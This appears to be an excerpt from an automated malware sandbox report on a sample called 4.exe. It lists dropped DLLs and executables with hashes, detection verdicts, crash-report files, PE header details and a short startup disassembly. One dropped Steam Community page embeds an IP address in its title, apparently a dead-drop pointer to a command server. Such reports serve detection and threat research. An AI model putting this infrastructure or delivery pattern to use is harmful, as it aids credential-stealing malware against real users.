                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.9889980729271008
                                                                              Encrypted:false
                                                                              SSDEEP:96:elGQyqrsyhqnFI7qnIfqBQXIDcQRc6ecEIcw3vAC+HbHg/8BRTf32rLOyKZzTvS9:CfrCNM0vayOjvPFPzuiFxZ24IO8d
                                                                              MD5:77E823235AEF409E7E2972F7C0EE5BA7
                                                                              SHA1:20489196181EAD2610E9C796F7BC77ED24472319
                                                                              SHA-256:B74D235F91E0C50797CC052DCD886E77AC40490D59344869DDBABCBF1A813DDA
                                                                              SHA-512:3947FA01E4FC2BF264C74243824FF4CCE931097C45B770493769C9B6937B9B5507C399341B2DBBFB138CA1A01849FC7C240EC4AD41F38E71727830F15D16F4A1
                                                                              Malicious:false
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.1.8.5.3.9.2.3.4.1.4.4.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.1.8.5.3.9.2.8.7.2.7.0.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.7.4.a.a.5.a.-.a.b.c.7.-.4.0.1.3.-.9.d.c.4.-.d.7.a.4.2.3.4.7.3.3.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.e.1.6.e.c.4.-.6.7.1.1.-.4.2.d.9.-.b.1.b.2.-.8.d.c.6.4.8.5.0.c.d.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.4.4.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.8.-.0.0.0.1.-.0.0.1.4.-.c.c.b.a.-.9.b.d.a.4.5.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.7.8.b.8.8.5.4.c.d.7.4.e.3.8.8.f.c.3.3.3.b.c.1.f.e.f.1.3.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.F.4.4.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 15 streams, Sun May 26 08:23:12 2024, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):52894
                                                                              Entropy (8bit):2.830995868593885
                                                                              Encrypted:false
                                                                              SSDEEP:384:+hbUjDtaeTBmY3a2f0FHhZHo1Cg0UQj7D:gbU3TBHq2f0FHhZHoLfQ7
                                                                              MD5:9E5235DCD44CFB38D84CE7E624AA5205
                                                                              SHA1:475B0F36D00D0348B09FA65B4B471FECFAE8C6A6
                                                                              SHA-256:F743B5CD52A9E756841448C928E9A1244B75B91EF24DDFFE080D696DC34917B2
                                                                              SHA-512:2DBA91A4D1022763DB8AC5840DEA590FE33A4F252C02A8C3A143A8B077F2D17FF48F9B918B26AF1B80EEF336320F0B96BBA8B76CF53EFA8CE358EF1E9B49E93D
                                                                              Malicious:false
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8288
                                                                              Entropy (8bit):3.694308257143958
                                                                              Encrypted:false
                                                                              SSDEEP:192:R6l7wVeJPR6S86Y9rSULhgmfPopDy89blJsfo3m:R6lXJp6B6YBSULhgmfPOlifF
                                                                              MD5:76B7472523084A5986E2C4100E7906F3
                                                                              SHA1:988860BAE933A5E7A8494E061CC7D0D986F9672F
                                                                              SHA-256:5F02BDA1A7692F206230DE9782784D827C4B25E8677CD2BB4FD2576351DBABF1
                                                                              SHA-512:12C2BC16D27D24A10BAED3804F080C86777D8043BD859DB908EBCB7FB318030074CB78B6772F01C573A14661A6188D23C4ED60AD30D2D9C61E17E20761B7AA11
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.2.<./.P.i.
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4537
                                                                              Entropy (8bit):4.4352162046648
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zsHCJg77aI983WpW8VYLqYm8M4JwMfpMFX22+q8FziKmTmTogd:uIjfwI7SG7VyJwMBn2AzFmTgogd
                                                                              MD5:3053D2BE1C2B94C27C17149249B0F4B9
                                                                              SHA1:12EF54FCFA81AE79D6259F18A5CDCCBD8C2ECC9E
                                                                              SHA-256:492FF479F0DBB891202C5751EFC0765E6A2583EB026F8545B0236CDB05493965
                                                                              SHA-512:3A060E255BA9336C1429B3D5B6051BF3D22AD0663FFA0E58BB0C60190D502C3152454D9D0E9AF832AE1FE130EE72C74E47BEF0A4F7E16485E7895AAD91FEC559
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="339805" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):35682
                                                                              Entropy (8bit):5.380976277523381
                                                                              Encrypted:false
                                                                              SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SL:s78LtWYmwt5D0gqOac7PzzgiJmDzJtx3
                                                                              MD5:1466716F0C9153F76BB57D4860843664
                                                                              SHA1:060D12CA6D7A80B42795403C5A6A233B9F259F26
                                                                              SHA-256:FAFEE04A5A012597F585AEE58155A34C5531E7E7E1F91D60B9FE893F8E7CBB29
                                                                              SHA-512:9FFEB17451760CBDB1A861B2C6C4E4087E7E984005963C0B33BB26FA94C2A388C61ED992107B3543DE5D98F5BC267288DEB1AF14A296D607D22138E7AEE2726A
                                                                              Malicious:false
                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2459136
                                                                              Entropy (8bit):6.052474106868353
                                                                              Encrypted:false
                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):2121216
                                                                              Entropy (8bit):6.847302783302968
                                                                              Encrypted:false
                                                                              SSDEEP:49152:s4K3x1vU6JtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex186tIuoITsdZ
                                                                              MD5:7BDE08F5DD2A433DAE25A8F8B3E70970
                                                                              SHA1:648FF6ECDB0E0769055EA8FFC49A78D6833632E4
                                                                              SHA-256:3F8A5414C8ED56D541974D3B650C9CF798A2FDEFEAF5FB307540FD64C99D29D5
                                                                              SHA-512:5BF3773D438E15077C129B45767536B63D304989C7DCBAFF12417550AE29E1858CD825024A351C9B3F418BCD619226BF5580AB01EF840A8B9BAAC95617FB166A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):325120
                                                                              Entropy (8bit):7.384635086921583
                                                                              Encrypted:false
                                                                              SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                                              MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                                              SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                                              SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                                              SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Process:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):881664
                                                                              Entropy (8bit):6.555251818096116
                                                                              Encrypted:false
                                                                              SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                                              MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                              SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                                              SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                                              SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):240128
                                                                              Entropy (8bit):6.768367883653815
                                                                              Encrypted:false
                                                                              SSDEEP:3072:a5My9dAbFfJ30bYKMy+WlmKwkGLVmWDju8Ogxsqtoe8MGRT8:UUbFfJEb7LM5t9OgfdaRT
                                                                              MD5:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              SHA1:79EA2D473E72751803C9650AE5C6B144A0AA4879
                                                                              SHA-256:C166B490846D441400727765DD668262087642BAE1BBFD7AAF7A1BED5AA35B62
                                                                              SHA-512:C7931368FFFEB684C6DE5A7AFFE168F11C1E1D5FED5F843FB0FF98F393C49909E202FB7D500F126097F5E5DDF69BEB1FE900C27BD918C2D8D4A69C451B053ED5
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.768367883653815
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:4.exe
                                                                              File size:240'128 bytes
                                                                              MD5:73ddf9a7f42e0452b6aa00f4e0a0afd5
                                                                              SHA1:79ea2d473e72751803c9650ae5c6b144a0aa4879
                                                                              SHA256:c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
                                                                              SHA512:c7931368fffeb684c6de5a7affe168f11c1e1d5fed5f843fb0ff98f393c49909e202fb7d500f126097f5e5ddf69beb1fe900c27bd918c2d8d4a69c451b053ed5
                                                                              SSDEEP:3072:a5My9dAbFfJ30bYKMy+WlmKwkGLVmWDju8Ogxsqtoe8MGRT8:UUbFfJEb7LM5t9OgfdaRT
                                                                              TLSH:6134BF017EDCD475E96346304834CAA5667EFCB6FA658A4733883F0FB8317906B62762
                                                                              Icon Hash:714145254148404b
                                                                              Entrypoint:0x4043e7
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x65652355 [Mon Nov 27 23:16:37 2023 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:5
                                                                              OS Version Minor:1
                                                                              File Version Major:5
                                                                              File Version Minor:1
                                                                              Subsystem Version Major:5
                                                                              Subsystem Version Minor:1
                                                                              Import Hash:8744ff8cb8213e20c3a4b3f29831f2ef
                                                                              Instruction
                                                                              call 00007F74C0709867h
                                                                              jmp 00007F74C0704C64h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              push esi
                                                                              mov esi, ecx
                                                                              and dword ptr [esi+04h], 00000000h
                                                                              mov dword ptr [esi], 00411260h
                                                                              mov byte ptr [esi+08h], 00000000h
                                                                              push dword ptr [eax]
                                                                              call 00007F74C0704E8Dh
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              mov eax, dword ptr [ebp+08h]
                                                                              mov dword ptr [ecx], 00411260h
                                                                              mov eax, dword ptr [eax]
                                                                              mov dword ptr [ecx+04h], eax
                                                                              mov eax, ecx
                                                                              mov byte ptr [ecx+08h], 00000000h
                                                                              pop ebp
                                                                              retn 0008h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              and dword ptr [esi+04h], 00000000h
                                                                              mov dword ptr [esi], 00411260h
                                                                              mov byte ptr [esi+08h], 00000000h
                                                                              call 00007F74C0704DF7h
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              mov dword ptr [ecx], 00411260h
                                                                              jmp 00007F74C0704E7Bh
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              push edi
                                                                              mov edi, dword ptr [ebp+08h]
                                                                              mov esi, ecx
                                                                              cmp esi, edi
                                                                              je 00007F74C0704DFFh
                                                                              call 00007F74C0704E68h
                                                                              cmp byte ptr [edi+08h], 00000000h
                                                                              je 00007F74C0704DEEh
                                                                              push dword ptr [edi+04h]
                                                                              mov ecx, esi
                                                                              call 00007F74C0704E1Ah
                                                                              jmp 00007F74C0704DE8h
                                                                              mov eax, dword ptr [edi+04h]
                                                                              mov dword ptr [esi+04h], eax
                                                                              pop edi
                                                                              mov eax, esi
                                                                              pop esi
                                                                              pop ebp
                                                                              retn 0004h
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push esi
                                                                              mov esi, ecx
                                                                              mov dword ptr [esi], 00411260h
                                                                              call 00007F74C0704E37h
                                                                              test byte ptr [ebp+08h], 00000001h
                                                                              je 00007F74C0704DE9h
                                                                              push esi
                                                                              call 00007F74C070308Bh
                                                                              Programming Language:
                                                                              • [ASM] VS2013 build 21005
                                                                              • [ C ] VS2013 build 21005
                                                                              • [C++] VS2013 build 21005
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              • [C++] VS2013 UPD5 build 40629
                                                                              • [RES] VS2013 build 21005
                                                                              • [LNK] VS2013 UPD5 build 40629
                                                                              Name | Virtual Address | Virtual Size | Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x169f4 | 0x50 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x288c000 | 0xd180 | .rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x16a44 | 0x1c | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x15f50 | 0x40 | .rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
